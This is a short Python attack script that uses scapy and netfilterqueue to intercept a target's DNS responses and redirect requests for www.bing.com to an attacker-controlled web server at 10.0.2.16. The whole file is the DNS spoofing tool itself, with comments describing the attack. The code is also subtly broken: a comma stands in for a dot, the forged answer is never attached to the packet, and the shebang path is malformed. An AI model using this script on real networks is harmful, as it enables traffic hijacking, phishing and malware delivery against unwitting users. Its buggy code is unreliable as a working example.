#!usr/bin/env python

#Here we are dns spoofing the target and redirecting them to our own webserver when they try to access bing.com

import netfilterqueue
import scapy.all as scapy

def process_packet(packet):
    scapy_packet = scapy.IP(packet.get_payload())   #converting into scapy packet
    if scapy_packet.haslayer(scapy.DNSRR):   #checking for DNS response layer
       qname = scapy_packet[scapy.DNSQR].qname  #checking target is visting desired website or not
       if "www.bing.com" in qname:
          print("[+]spoofing target")
          answer = scapy,DNSRR(rrname=qname,rdata="10.0.2.16")   #redirecting target to the desired ip address
          scapy_packet[scapy.DNS].an
          scapy_packet[scapy.DNS].ancount=1

          del scapy_packet[scapy.IP].len
          del scapy_packet[scapy.IP].chksum
          del scapy_packet[scapy.UDP].len
          del scapy_packet[scapy.UDP].chksum

          packet.set_payload(str(scapy_packet))

    packet.accept()  #to forward the packets

queue = netfilterqueue.NetfilterQueue()  #creating an instance of queue
queue.bind(0,process_packet)  #binding the queue and call back function
queue.run()
